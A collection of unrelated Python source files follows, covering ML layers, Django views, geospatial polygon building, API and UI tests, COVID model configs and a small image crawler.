intel64.ideep.localResponseNormalizationParam.lrn_across_channels)
y, indexes = intel64.ideep.localResponseNormalization.Forward(
intel64.ideep.array(x), param)
self.indexes = indexes
return y,
def forward_gpu(self, inputs):
x, = inputs
self.retain_inputs((0,))
self.retain_outputs((0,))
self.y = cuda.cupy.square(x) # temporary
self.scale = cuda.cupy.empty_like(self.y)
_cu_conv_sum(self.scale, self.y, self.n)
cuda.elementwise(
'T x, T k, T alpha, T beta',
'T y, T scale',
'''scale = k + alpha * scale;
y = x * pow(scale, -beta);''',
'lrn_fwd')(x, self.k, self.alpha, self.beta,
self.y, self.scale)
return self.y,
def backward(self, indexes, grad_outputs):
x, = self.get_retained_inputs()
y, = self.get_retained_outputs()
gy, = grad_outputs
f = LocalResponseNormalizationGrad(
self.n, self.k, self.alpha, self.beta, self._use_ideep,
self.scale, self.indexes, self.unit_scale,)
return f.apply((x, y, gy))
class LocalResponseNormalizationGrad(function_node.FunctionNode):
def __init__(self, n, k, alpha, beta, use_ideep,
scale=None, indexes=None, unit_scale=None):
self.n = n
self.k = k
self.alpha = alpha
self.beta = beta
self._use_ideep = use_ideep
self.scale = scale
self.indexes = indexes
self.unit_scale = unit_scale
def forward_cpu(self, inputs):
if self._use_ideep:
return self._backward_ideep(inputs)
x, y, gy = inputs
half_n = self.n // 2
summand = y * gy / self.unit_scale
sum_part = summand.copy()
for i in six.moves.range(1, half_n + 1):
sum_part[:, i:] += summand[:, :-i]
sum_part[:, :-i] += summand[:, i:]
gx = gy * self.scale - 2 * self.alpha * self.beta * x * sum_part
return gx,
def _backward_ideep(self, inputs):
x, y, gy = inputs
param = intel64.ideep.localResponseNormalizationParam(
self.n, self.k, self.n * self.alpha, self.beta,
intel64.ideep.localResponseNormalizationParam.lrn_across_channels
)
gx = intel64.ideep.localResponseNormalization.Backward(
intel64.ideep.array(x),
intel64.ideep.array(gy),
self.indexes,
param)
return gx,
def forward_gpu(self, inputs):
x, y, gy = inputs
summand = cuda.elementwise(
'T scale, T y, T gy', 'T summand',
'summand = y * gy / scale',
'lrn_bwd_summand')(self.scale, y, gy)
gx = cuda.cupy.empty_like(x)
_cu_conv_sum(gx, summand, self.n)
cuda.elementwise(
' T x, T gy, T scale, T beta, T coeff', 'T gx',
'gx = pow(scale, -beta) * gy - coeff * x * gx',
'lrn_bwd')(x, gy, self.scale,
self.beta, 2 * self.alpha * self.beta, gx)
return gx,
def backward(self, indexes, grad_outputs):
# No trivial way to implement double-backward for this function.
raise NotImplementedError
def local_response_normalization(x, n=5, k=2, alpha=1e-4, beta=.75):
"""Local response normalization across neighboring channels.
    This function implements normalization across channels. Let :math:`x` be an
    input image with :math:`N` channels. Then, this function computes an output
    image :math:`y` by the following formula:
    .. math::
        y_i = \\frac{x_i}{\\left( k + \\alpha
        \\sum_{j=\\max(1, i - n/2)}^{\\min(N, i + n/2)} x_j^2 \\right)^{\\beta}}.
Args:
x (:class:`~chainer.Variable` or :ref:`ndarray`): Input variable.
n (int): Normalization window width.
k (float): Smoothing parameter.
alpha (float): Normalizer scaling parameter.
beta (float): Normalizer power parameter.
Returns:
~chainer.Variable: Output variable.
See: Section 3.3 of `ImageNet Classification with Deep Convolutional
Neural Networks <https://www.cs.toronto.edu/~fritz/absps/imagenet.pdf>`_
"""
return LocalResponseNormalization(n, k, alpha, beta).apply((x,))[0]
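# A minimal CPU sketch (shapes and values are illustrative only): run LRN over a
# random NCHW batch and print the resulting shape.
if __name__ == '__main__':
    _x = numpy.random.rand(2, 8, 6, 6).astype(numpy.float32)
    _y = local_response_normalization(_x, n=5, k=2, alpha=1e-4, beta=0.75)
    print(_y.shape)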
|
68842
|
import pytest
from bepasty.storage.filesystem import Storage
def test_contains(tmpdir):
storage = Storage(str(tmpdir))
name = "foo"
# check if it is not there yet
assert name not in storage
with storage.create(name, 0):
# we just want it created, no need to write sth into it
pass
# check if it is there
assert name in storage
storage.remove(name)
# check if it is gone
assert name not in storage
def test_iter(tmpdir):
storage = Storage(str(tmpdir))
# nothing there yet
assert list(storage) == []
names = ["foo", "bar", "baz", ]
for name in names:
with storage.create(name, 0):
# we just want it created, no need to write sth into it
pass
assert set(list(storage)) == set(names)
def test_invalid_name(tmpdir):
storage = Storage(str(tmpdir))
name = "../invalid"
with pytest.raises(RuntimeError):
storage.create(name, 0)
|
68844
|
from django.conf.urls.defaults import *
urlpatterns = patterns('',
url(r'^login/$', 'authsub.views.login', name="authsub_login"),
)
|
68885
|
from __future__ import absolute_import
import pkg_resources
__version__ = '0.3.0'
BASE_JAR = "pyleus-base.jar"
BASE_JAR_PATH = pkg_resources.resource_filename('pyleus', BASE_JAR)
|
68904
|
RTL_LANGUAGES = {
'he', 'ar', 'arc', 'dv', 'fa', 'ha',
'khw', 'ks', 'ku', 'ps', 'ur', 'yi',
}
COLORS = {
'primary': '#0d6efd', 'blue': '#0d6efd', 'secondary': '#6c757d',
'success': '#198754', 'green': '#198754', 'danger': '#dc3545',
'red': '#dc3545', 'warning': '#ffc107', 'yellow': '#ffc107',
'info': '#0dcaf0', 'cyan': '#0dcaf0', 'gray': '#adb5bd',
'dark': '#000', 'black': '#000', 'white': '#fff',
'teal': '#20c997', 'orange': '#fd7e14', 'pink': '#d63384',
'purple': '#6f42c1', 'indigo': '#6610f2', 'light': '#f8f9fa',
}
DEFAULT_ASSESSMENT_BUTTON_COLOR = '#0d6efd' # primary
DEFAULT_ASSESSMENT_BUTTON_ACTIVE_COLOR = '#fff' # white
|
68908
|
from shapely.geometry import Point, MultiPoint, Polygon, MultiPolygon
from shapely.ops import cascaded_union, polygonize
from shapely.prepared import prep
from rtree import Rtree
import sys, random, json, numpy, math, pickle, os
SAMPLE_ITERATIONS = 200
SAMPLE_SIZE = 5
MEDIAN_THRESHOLD = 5.0
median_distance_cache = {}
def median_distances(pts, aggregate=numpy.median):
key = tuple(sorted(pts))
if key in median_distance_cache: return median_distance_cache[key]
median = (numpy.median([pt[0] for pt in pts]),
numpy.median([pt[1] for pt in pts]))
distances = []
for pt in pts:
dist = math.sqrt(((median[0]-pt[0])*math.cos(median[1]*math.pi/180.0))**2+(median[1]-pt[1])**2)
distances.append((dist, pt))
median_dist = aggregate([dist for dist, pt in distances])
median_distance_cache[key] = (median_dist, distances)
return (median_dist, distances)
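# Illustration (coordinates are made up): for a place whose points include one
# far-away outlier, median_distances() returns the aggregate distance plus the
# per-point distances that the outlier-filtering pass below uses, e.g.
#   median_dist, distances = median_distances([(0.0, 0.0), (0.1, 0.0), (5.0, 5.0)])
#   keep = [pt for dist, pt in distances if dist < median_dist * MEDIAN_THRESHOLD]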
def mean_distances(pts):
return median_distances(pts, numpy.mean)
name_file, point_file = sys.argv[1:3]
places = {}
names = {}
if os.path.exists(point_file + '.cache'):
print >>sys.stderr, "Reading from %s cache..." % point_file
    names, places = pickle.load(file(point_file + ".cache", "rb"))
else:
all_names = {}
count = 0
for line in file(name_file):
place_id, name = line.strip().split(None, 1)
all_names[int(place_id)] = name
count += 1
if count % 1000 == 0:
print >>sys.stderr, "\rRead %d names from %s." % (count, name_file),
print >>sys.stderr, "\rRead %d names from %s." % (count, name_file)
count = 0
for line in file(point_file):
place_id, lon, lat = line.strip().split()
place_id = int(place_id)
names[place_id] = all_names.get(place_id, "")
point = (float(lon), float(lat))
pts = places.setdefault(place_id, set())
pts.add(point)
count += 1
if count % 1000 == 0:
print >>sys.stderr, "\rRead %d points in %d places." % (count, len(places)),
print >>sys.stderr, "\rRead %d points in %d places." % (count, len(places))
count = 0
discarded = 0
for place_id, pts in places.items():
count += 1
print >>sys.stderr, "\rComputing outliers for %d of %d places..." % (count, len(places)),
median_dist, distances = median_distances(pts)
keep = [pt for dist, pt in distances if dist < median_dist * MEDIAN_THRESHOLD]
discarded += len(pts) - len(keep)
places[place_id] = keep
print >>sys.stderr, "%d points discarded." % discarded
if not os.path.exists(point_file + '.cache'):
print >>sys.stderr, "Caching points..."
    pickle.dump((names, places), file(point_file + ".cache", "wb"), -1)
print >>sys.stderr, "Indexing..."
points = []
place_list = set()
for place_id, pts in places.items():
for pt in pts:
place_list.add((len(points), pt+pt, None))
points.append((place_id, Point(pt)))
index = Rtree(place_list)
"""
REASSIGNMENT_PASSES = 10
iterations = 0
count = 0
queue = places.keys() + [None]
while len(queue) > 1:
place_id = queue.pop(0)
if place_id is None:
count = 0
iterations += 1
queue.append(None)
place_id = queue.pop(0)
if not places[place_id]:
del places[place_id]
continue
pts = places[place_id]
count += 1
print >>sys.stderr, "\rIteration #%d of reassignment: %d of %d places..." % (iterations, count, len(queue)),
if iterations > len(pts) / 10.0: continue
old_source_mean, distances = mean_distances(pts)
_, outlier = max(distances)
best = (None, 0.0)
print >>sys.stderr, ""
for nearest in index.nearest(outlier.bounds, 3, objects=True):
#print >>sys.stderr, " -> %s (%d) versus %s (%d)" % (outlier, place_id, Point(nearest.bbox[0:2]), nearest.id)
if nearest.id == place_id: continue
old_target_mean, _ = mean_distances(places[nearest.id])
source = list(pts)
source.remove(outlier)
target = list(places[nearest.id]) + [outlier]
#print >>sys.stderr, " source: new=%d items, old=%d items" % (len(source), len(pts))
new_source_mean, _ = mean_distances(source)
new_target_mean, _ = mean_distances(target)
print >>sys.stderr, " source mean: new=%.6f, old=%.6f" % (old_source_mean, new_source_mean)
print >>sys.stderr, " target mean: new=%.6f, old=%.6f" % (old_target_mean, new_target_mean)
if new_source_mean < old_source_mean and \
new_target_mean < old_target_mean:
improvement = (old_source_mean - new_source_mean) \
+ (old_target_mean - new_target_mean)
if improvement > best[1]:
best = (nearest.id, improvement)
if best[1] > 0:
pts.remove(outlier)
places[best[0]].append(outlier)
queue.append(place_id)
print >>sys.stderr, "%s moved from %d to %d." % (outlier, place_id, best[0])
print >>sys.stderr, "Done."
"""
sample_hulls = {}
count = 0
for place_id, pts in places.items():
hulls = []
if len(pts) < 3:
print >>sys.stderr, "\n ... discarding place #%d" % place_id
continue
for i in range(min(len(pts), SAMPLE_ITERATIONS)):
multipoint = MultiPoint(random.sample(pts, min(SAMPLE_SIZE, len(pts))))
hull = multipoint.convex_hull
if isinstance(hull, Polygon) and not hull.is_empty: hulls.append(hull)
try:
sample_hulls[place_id] = cascaded_union(hulls)
except:
print >>sys.stderr, hulls
sys.exit()
if hasattr(sample_hulls[place_id], "geoms"):
sample_hulls[place_id] = cascaded_union([hull for hull in sample_hulls[place_id] if type(hull) is Polygon])
count += SAMPLE_ITERATIONS
print >>sys.stderr, "\rComputing %d of %d hulls..." % (count, (len(places) * SAMPLE_ITERATIONS)),
print >>sys.stderr, "\nCombining hull boundaries..."
boundaries = cascaded_union([hull.boundary for hull in sample_hulls.values()])
print >>sys.stderr, "Polygonizing %d boundaries..." % len(boundaries)
rings = list(polygonize(boundaries))
for i, ring in enumerate(rings):
print >>sys.stderr, "\rBuffering %d of %d polygons..." % (i, len(rings)),
size = math.sqrt(ring.area)*0.1
rings[i] = ring.buffer(size)
print >>sys.stderr, "Done."
polygons = {}
count = 0
for polygon in rings:
if polygon.is_empty: continue
place_count = dict((place_id, 0) for place_id in places)
prepared = prep(polygon)
for item in index.intersection(polygon.bounds):
place_id, point = points[item]
if prepared.intersects(point):
place_count[place_id] += 1
pt_count, place_id = max((c, i) for (i, c) in place_count.items())
polys = polygons.setdefault(place_id, [])
polys.append(polygon)
count += 1
print >>sys.stderr, "\rAssigning %d of %d polygons..." % (count,len(rings)),
print >>sys.stderr, "Done."
count = 0
for place_id, polys in polygons.items():
polygons[place_id] = cascaded_union(polys)
count += 1
print >>sys.stderr, "\rUnifying %d of %d polygons..." % (count,len(polygons)),
print >>sys.stderr, "Done."
count = 0
orphans = []
for place_id, multipolygon in polygons.items():
count += 1
print >>sys.stderr, "\rRemoving %d orphans from %d of %d polygons..." % (len(orphans), count, len(polygons)),
if type(multipolygon) is not MultiPolygon: continue
polygon_count = [0] * len(multipolygon)
for i, polygon in enumerate(multipolygon.geoms):
prepared = prep(polygon)
for item in index.intersection(polygon.bounds):
item_id, point = points[item]
if item_id == place_id and prepared.intersects(point):
polygon_count[i] += 1
winner = max((c, i) for (i, c) in enumerate(polygon_count))[1]
polygons[place_id] = multipolygon.geoms[winner]
orphans.extend(p for i, p in enumerate(multipolygon.geoms) if i != winner)
print >>sys.stderr, "Done."
count = 0
changed = True
while changed and orphans:
orphan = orphans.pop(0)
changed = False
count += 1
print >>sys.stderr, "\rReassigning %d of %d orphans..." % (count, len(orphans)),
place_count = dict((place_id, 0) for place_id in places)
total_count = 0.0
prepared = prep(orphan)
for item in index.intersection(orphan.bounds):
item_id, point = points[item]
if prepared.intersects(point):
place_count[item_id] += 1
total_count += 1
for place_id, ct in place_count.items():
if total_count > 0 and float(ct)/total_count > 1/3.0:
polygons[place_id] = polygons[place_id].union(orphan)
changed = True
if not changed:
orphans.append(orphan)
print >>sys.stderr, "Done."
print >>sys.stderr, "\nWriting output."
features = []
for place_id, poly in polygons.items():
features.append({
"type": "Feature",
"id": place_id,
"geometry": poly.__geo_interface__,
"properties": {"woe_id": place_id, "name": names.get(place_id, "")}
})
collection = {
"type": "FeatureCollection",
"features": features
}
print json.dumps(collection)
|
68975
|
from .GrdFile import *
from .MdfFile import *
from .TimeSeriesFile import *
from .DepFile import *
from .Simulation import *
|
68992
|
subscription_data=\
{
"description": "A subscription to get info about Room1",
"subject": {
"entities": [
{
"id": "Room1",
"type": "Room",
}
],
"condition": {
"attrs": [
"p3"
]
}
},
"notification": {
"http": {
"url": "http://192.168.100.162:8888"
},
"attrs": [
"p1",
"p2",
"p3"
]
},
"expires": "2040-01-01T14:00:00.00Z",
"throttling": 5
}
#data to test the following code for broker.thinBroker.go:946
'''
subReqv2 := SubscriptionRequest{}
err := r.DecodeJsonPayload(&subReqv2)
if err != nil {
rest.Error(w, err.Error(), http.StatusInternalServerError)
return
}
'''
subscriptionWrongPaylaod=\
{
"description": "A subscription to get info about Room1",
"subject": {
"entities": [
{
"id": "Room1",
"type": "Room",
"ispattern":"false"
}
],
"condition": {
"attrs": [
"p3"
]
}
},
"notification": {
"http": {
"url": "http://192.168.100.162:8888"
},
"attrs": [
"p1",
"p2",
"p3"
]
},
"expires": "2040-01-01T14:00:00.00Z",
"throttling": 5
}
v1SubData=\
{
"entities": [
{
"id": "Room1",
"type": "Room",
}
],
"reference": "http://192.168.100.162:8668/ngsi10/updateContext"
}
updateDataWithupdateaction=\
{
"contextElements": [
{
"entityId": {
"id": "Room1",
"type": "Room"
},
"attributes": [
{
"name": "p1",
"type": "float",
"value": 60
},
{
"name": "p3",
"type": "float",
"value": 69
},
{
"name": "p2",
"type": "float",
"value": 32
}
],
"domainMetadata": [
{
"name": "location",
"type": "point",
"value": {
"latitude": 49.406393,
"longitude": 8.684208
}
}
]
}
],
"updateAction": "UPDATE"
}
createDataWithupdateaction=\
{
"contextElements": [
{
"entityId": {
"id": "Room1",
"type": "Room"
},
"attributes": [
{
"name": "p1",
"type": "float",
"value": 90
},
{
"name": "p3",
"type": "float",
"value": 70
},
{
"name": "p2",
"type": "float",
"value": 12
}
],
"domainMetadata": [
{
"name": "location",
"type": "point",
"value": {
"latitude": 49.406393,
"longitude": 8.684208
}
}
]
}
],
"updateAction": "CRETAE"
}
deleteDataWithupdateaction=\
{
"contextElements": [
{
"entityId": {
"id": "Room1",
"type": "Room"
},
"attributes": [
{
"name": "p1",
"type": "float",
"value": 12
},
{
"name": "p3",
"type": "float",
"value": 13
},
{
"name": "p2",
"type": "float",
"value": 14
}
],
"domainMetadata": [
{
"name": "location",
"type": "point",
"value": {
"latitude": 49.406393,
"longitude": 8.684208
}
}
]
}
],
"updateAction": "DELETE"
}
|
68994
|
import unittest
import time
from tir import Webapp
from datetime import datetime
DateSystem = datetime.today().strftime('%d/%m/%Y')
"""-------------------------------------------------------------------
/*/{Protheus.doc} FINA560TestCase
TIR - Test cases for the petty cash (Caixinha) movements routine
@author <NAME>
@since 23/06/2020
@version 12
-------------------------------------------------------------------"""
class FINA560(unittest.TestCase):
#-------------------------------------------
# setUpClass initialization for TIR - FINA560
#-------------------------------------------
@classmethod
def setUpClass(inst):
inst.oHelper = Webapp()
inst.oHelper.Setup("SIGAFIN",DateSystem,"T1","D MG 01 ","06")
inst.oHelper.Program('FINA560')
#-----------------------------------------
#{Protheus.doc} FINA560_CT010
#Validates adding an advance with an amount greater than the available balance.
#author <NAME>
#since 23/06/2020
#version 1.0
#See https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-
#-----------------------------------------
def test_FINA560_CT010(self):
self.oHelper.WaitShow("Movimento do Caixinha")
self.oHelper.SetButton('Incluir')
self.oHelper.SetBranch('D MG 01')
self.oHelper.SetValue('EU_CAIXA','110')
self.oHelper.SetValue('EU_TIPO','01')
self.oHelper.SetValue('EU_HISTOR','TESTE VALOR')
self.oHelper.SetValue('EU_NRCOMP','00001')
self.oHelper.SetValue('EU_VALOR',"10.000,00")
self.oHelper.SetValue('EU_BENEF','BENEF. TESTE')
self.oHelper.SetValue('EU_CAIXA','120')
self.oHelper.SetButton('Salvar')
self.oHelper.CheckHelp(text='FA560SALDO',button='Fechar')
self.oHelper.WaitShow("Movimento do Caixinha")
self.oHelper.SetButton('Cancelar')
self.oHelper.AssertTrue()
#-------------------------------------------
# Class teardown for TIR - FINA560
#-------------------------------------------
@classmethod
def tearDownClass(inst):
inst.oHelper.TearDown()
if __name__ == '__main__':
unittest.main()
|
69017
|
from rest_framework.test import APIClient
from tests.app.serializers import QuoteSerializer
from tests.utils import decode_content
def test_list_response_unfiltered():
response = APIClient().get('/quotes/')
expected = [
{
'character': 'Customer',
'line': "It's certainly uncontaminated by cheese",
'sketch': 'CHEESE SHOP',
},
{
'character': 'The Black Knight',
'line': "It's just a flesh wound",
'sketch': 'HOLY GRAIL',
},
]
content = decode_content(response)
assert content == expected
def test_detail_response_unfiltered():
response = APIClient().get('/quotes/parrot/')
expected = {
'character': 'Shopkeeper',
'line': "Well, he's...he's, ah...probably pining for the fjords",
'sketch': 'PET SHOP',
}
content = decode_content(response)
assert content == expected
def test_list_response_filtered_includes():
response = APIClient().get('/quotes/?fields=character,line')
expected = [
{
'character': 'Customer',
'line': "It's certainly uncontaminated by cheese",
},
{
'character': 'The Black Knight',
'line': "It's just a flesh wound",
},
]
content = decode_content(response)
assert content == expected
def test_detail_response_filtered_includes():
response = APIClient().get('/quotes/parrot/?fields=character,line')
expected = {
'character': 'Shopkeeper',
'line': "Well, he's...he's, ah...probably pining for the fjords",
}
content = decode_content(response)
assert content == expected
def test_list_response_filtered_excludes():
response = APIClient().get('/quotes/?fields!=character')
expected = [
{
'line': "It's certainly uncontaminated by cheese",
'sketch': 'CHEESE SHOP',
},
{
'line': "It's just a flesh wound",
'sketch': 'HOLY GRAIL',
},
]
content = decode_content(response)
assert content == expected
def test_detail_response_filtered_excludes():
response = APIClient().get('/quotes/parrot/?fields!=character')
expected = {
'line': "Well, he's...he's, ah...probably pining for the fjords",
'sketch': 'PET SHOP',
}
content = decode_content(response)
assert content == expected
def test_response_filtered_with_some_bogus_fields():
response = APIClient().get('/quotes/parrot/?fields=sketch,spam,eggs')
expected = {
'sketch': 'PET SHOP',
}
content = decode_content(response)
assert content == expected
def test_response_filtered_with_only_bogus_fields():
response = APIClient().get('/quotes/parrot/?fields=blah')
expected = {}
content = decode_content(response)
assert content == expected
def test_response_filtered_with_multiple_fields_in_separate_query_args():
response = APIClient().get('/quotes/parrot/?fields=character&fields=sketch')
expected = {
'character': 'Shopkeeper',
'sketch': 'PET SHOP',
}
content = decode_content(response)
assert content == expected
def test_response_filtered_with_include_and_exclude():
response = APIClient().get('/quotes/parrot/?fields=character&fields=sketch&fields!=line')
expected = {
'character': 'Shopkeeper',
'sketch': 'PET SHOP',
}
content = decode_content(response)
assert content == expected
def test_exclude_wins_for_ambiguous_filtering():
response = APIClient().get('/quotes/parrot/?fields=line,sketch&fields!=line')
expected = {
'sketch': 'PET SHOP',
}
content = decode_content(response)
assert content == expected
def test_post_ignores_queryfields():
# Ensures that fields aren't dropped for other types of request
response = APIClient().post('/quotes/?fields=line,sketch')
expected = {
'request_method': 'POST',
'serializer_instance_fields': ['character', 'line', 'sketch'],
'request_query': {'fields': 'line,sketch'},
}
content = decode_content(response)
assert content == expected
def test_instantiate_without_request_context():
# just test that it doesn't crash or b0rk the serializer to omit request context
data = {
'character': 'the character',
'line': 'the line',
'sketch': 'the sketch',
}
serializer = QuoteSerializer(data=data)
assert serializer.is_valid()
assert sorted(serializer.get_fields()) == ['character', 'line', 'sketch']
|
69019
|
from __future__ import absolute_import, division, print_function
import os
from idaskins import UI_DIR
from PyQt5 import uic
from PyQt5.Qt import qApp
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QCursor, QFont, QKeySequence
from PyQt5.QtWidgets import QShortcut, QWidget
Ui_ObjectInspector, ObjectInspectorBase = uic.loadUiType(
os.path.join(UI_DIR, 'ObjectInspector.ui')
)
class ObjectInspector(ObjectInspectorBase):
"""
Rudimentary Qt object inspector.
Allows for easier finding of object names and classes
for usage in QSS stylesheets.
"""
def __init__(self, *args, **kwargs):
super(ObjectInspector, self).__init__(*args, **kwargs)
self._selected_widget = None
self._ui = Ui_ObjectInspector()
self._ui.setupUi(self)
# Make everything monospace.
font = QFont('Monospace')
font.setStyleHint(QFont.TypeWriter)
self._ui.teInspectionResults.setFont(font)
# Register signals.
self._update_key = QShortcut(QKeySequence(Qt.Key_F7), self)
self._ui.btnSelectParent.released.connect(self.select_parent)
self._update_key.activated.connect(self.update_inspection)
def update_inspection(self):
widget = qApp.widgetAt(QCursor.pos())
self.update_selected_widget(widget)
def select_parent(self):
if self._selected_widget:
parent = self._selected_widget.parent()
if parent and parent.inherits('QWidget'):
self.update_selected_widget(parent)
def update_selected_widget(self, widget):
if self._selected_widget:
self._selected_widget.destroyed.disconnect(
self.on_selected_widget_destroyed
)
self._selected_widget = widget
if widget:
self._ui.btnSelectParent.setEnabled(widget.parent() is not None)
self._ui.teInspectionResults.setText((
"Type: {}\n"
"Name: {}\n"
"Number of children: {}\n"
"QSS: {}"
).format(
widget.metaObject().className(),
widget.objectName() or '<none>',
len(widget.children()),
widget.styleSheet() or '<none>',
))
self._selected_widget.destroyed.connect(
self.on_selected_widget_destroyed
)
else:
self._ui.teInspectionResults.setText('<no object under cursor>')
def on_selected_widget_destroyed(self, obj):
self._selected_widget = None
|
69044
|
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django.http import HttpResponseForbidden, JsonResponse
from django.shortcuts import get_object_or_404
from django.template.loader import render_to_string
from django.views.generic import View
from .categories import category_value
from .models import Rating
try:
from account.mixins import LoginRequiredMixin
except ImportError: # pragma: no cover
from django.contrib.auth.mixins import LoginRequiredMixin # pragma: no cover
NUM_OF_RATINGS = getattr(settings, "PINAX_RATINGS_NUM_OF_RATINGS", 5)
class RateView(LoginRequiredMixin, View):
def post(self, request, *args, **kwargs):
ct = get_object_or_404(ContentType, pk=self.kwargs.get("content_type_id"))
obj = get_object_or_404(ct.model_class(), pk=self.kwargs.get("object_id"))
rating_input = int(request.POST.get("rating"))
category = request.POST.get("category", "")
cat_choice = category_value(obj, category)
# Check for errors and bail early
if category and cat_choice is None:
return HttpResponseForbidden(
"Invalid category. It must match a preconfigured setting"
)
if rating_input not in range(NUM_OF_RATINGS + 1):
return HttpResponseForbidden(
"Invalid rating. It must be a value between 0 and {}".format(NUM_OF_RATINGS)
)
data = {
"user_rating": rating_input,
"category": category,
"overall_rating": Rating.update(
rating_object=obj,
user=request.user,
category=cat_choice,
rating=rating_input
)
}
# add support for eldarion-ajax
data.update({
"content_type_id": self.kwargs.get("content_type_id"),
"object_id": self.kwargs.get("object_id")
})
data.update({
"html": render_to_string("pinax/ratings/_rating.html", data, request)
})
return JsonResponse(data)
|
69050
|
import covid.models.SEIRD
import covid.models.SEIRD_variable_detection
import covid.models.SEIRD_incident
import covid.util as util
# 2020-04-25 forecast (?)
SEIRD = {
'model' : covid.models.SEIRD.SEIRD,
'args' : {} # use defaults
}
# 2020-05-03 forecast
strongest_prior = {
'model' : covid.models.SEIRD_variable_detection.SEIRD,
'args' : {
'gamma_shape': 100,
'sigma_shape': 100
}
}
# 2020-05-10 forecast
fit_dispersion = {
'model' : covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 100,
'sigma_shape': 100
}
}
# State forecasts starting 2020-05-17, all US forecasts
resample_80_last_10 = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 100,
'sigma_shape': 100,
'resample_high': 80,
'rw_use_last': 10
}
}
# State and US forecasts starting 2020-09-06
longer_H = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 100,
'sigma_shape': 100,
'resample_high': 80,
'rw_use_last': 10,
'H_duration_est': 18.0
}
}
# State and US forecasts starting 2020-09-20, except 2020-10-20
# changed gamma_shape and sigma_shape from 100 to 1000 on 2021-01-10
llonger_H = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 1000,
'sigma_shape': 1000,
'resample_high': 80,
'rw_use_last': 10,
'H_duration_est': 25.0
}
}
# Less rw
llonger_H_fix = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 1000,
'sigma_shape': 1000,
'resample_high': 80,
'rw_use_last': 10,
'rw_scale': 1e-1,
'H_duration_est': 25.0
}
}
# For debugging on May 10
# start with llonger_H_fix
# increase priors on sigma, beta, death_prob, death_rate by factor of 10
debug = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 1000,
'sigma_shape': 10000,
'beta_shape': 10,
'death_rate_shape': 100,
'death_prob_conc': 1000,
'resample_high': 80,
'rw_use_last': 10,
'rw_scale': 1e-1,
'H_duration_est': 25.0,
'num_warmup': 100,
'num_samples': 100
}
}
# For debugging on May 10
# start with llonger_H_fix
# increase priors on sigma, beta, death_prob, death_rate by factor of 10
fix = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 1000,
'sigma_shape': 10000,
'beta_shape': 10,
'death_rate_shape': 100,
'death_prob_conc': 1000,
'resample_high': 80,
'rw_use_last': 10,
'rw_scale': 1e-1,
'H_duration_est': 25.0
}
}
# State and US forecasts 2020-10-20
lllonger_H = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 100,
'sigma_shape': 100,
'resample_high': 80,
'rw_use_last': 10,
'H_duration_est': 35.0
}
}
# changed gamma_shape and sigma_shape from 100 to 1000 on 2021-01-10
counties = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 1000,
'sigma_shape': 1000,
'resample_high': 80,
'rw_use_last': 10,
'rw_scale': 1e-1,
'T_future': 8*7
}
}
counties_fix = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 100,
'sigma_shape': 100,
'resample_high': 80,
'rw_use_last': 10,
'rw_scale': 1e-1,
'T_future': 8*7,
'H_duration_est': 25.0,
'beta_shape': 1
}
}
|
69056
|
from winregistry.consts import ShortRootAlias, WinregType
from winregistry.models import RegEntry, RegKey
from winregistry.winregistry import WinRegistry
__all__ = (
"WinRegistry",
"RegEntry",
"RegKey",
"WinregType",
"ShortRootAlias",
)
|
69058
|
import time
print("I will write the same line 3 times, slowly.\n")
time.sleep(2)
for n in range(3):
print("Sleep ... zzz ...")
time.sleep(5)
print("\nThe End")
|
69061
|
from aiohttp_json_api.controller import DefaultController
from aiohttp_json_api.errors import ResourceNotFound
from aiohttp_json_api.fields.decorators import includes
import examples.fantasy.tables as tbl
from examples.fantasy.models import Author
class CommonController(DefaultController):
async def create_resource(self, data, **kwargs):
pass
async def fetch_resource(self, resource_id, **kwargs):
model = self.ctx.schema.opts.resource_cls
async with self.ctx.app['db'].acquire() as connection:
result = await model.fetch_one(connection, resource_id)
if result is None:
raise ResourceNotFound(type=self.ctx.resource_type, id=resource_id)
return result
async def query_collection(self, **kwargs):
model = self.ctx.schema.opts.resource_cls
async with self.ctx.app['db'].acquire() as connection:
results = await model.fetch_many(connection)
return results.values()
async def query_resource(self, resource_id, **kwargs):
return await self.fetch_resource(resource_id, **kwargs)
async def delete_resource(self, resource_id, **kwargs):
pass
class BooksController(CommonController):
@includes('author')
async def include_authors(self, field, resources, **kwargs):
authors_ids = set(r.author.id for r in resources)
if not authors_ids:
return ()
cte = Author.cte(where=(tbl.authors.c.id.in_(authors_ids)))
async with self.ctx.app['db'].acquire() as connection:
results = await Author.fetch_many(connection, cte)
return results.values()
|
69070
|
from funboost import boost
import re
import requests
from parsel import Selector
from pathlib import Path
"""
http://www.5442tu.com/mingxing/list_2_1.html  -- download all the celebrity pictures from this listing
"""
@boost('xiaoxianrou_list_page', qps=0.05)
def cralw_list_page(page_index):
url = f'http://www.5442tu.com/mingxing/list_2_{page_index}.html'
resp = requests.get(url)
sel = Selector(resp.content.decode('gbk'))
detail_sels = sel.xpath('//div[@class="imgList2"]/ul/li/a[1]')
for detail_sel in detail_sels:
crawl_detail_page.push(detail_sel.xpath('./@href').extract_first(), detail_sel.xpath('./@title').extract_first(), 1, is_first_picture=True)
@boost('xiaoxianrou_detail_page', qps=2, do_task_filtering=True)
def crawl_detail_page(url, title, picture_index, is_first_picture=False,):
resp = requests.get(url)
sel = Selector(resp.content.decode('gbk'))
if is_first_picture:  # the photo album on the detail page is paginated as well.
total_page_str = sel.xpath('//div[@class="page"]/ul/li/a/text()').extract_first()
total_page = int(re.search(r'共(\d+)页', total_page_str).group(1))
for p in range(2, total_page + 1):
next_pic_page_url = url[:-5] + f'_{p}.html'
crawl_detail_page.push(next_pic_page_url, title, picture_index=p)
pic_url = sel.xpath('//p[@align="center"]/a/img/@src').extract_first()
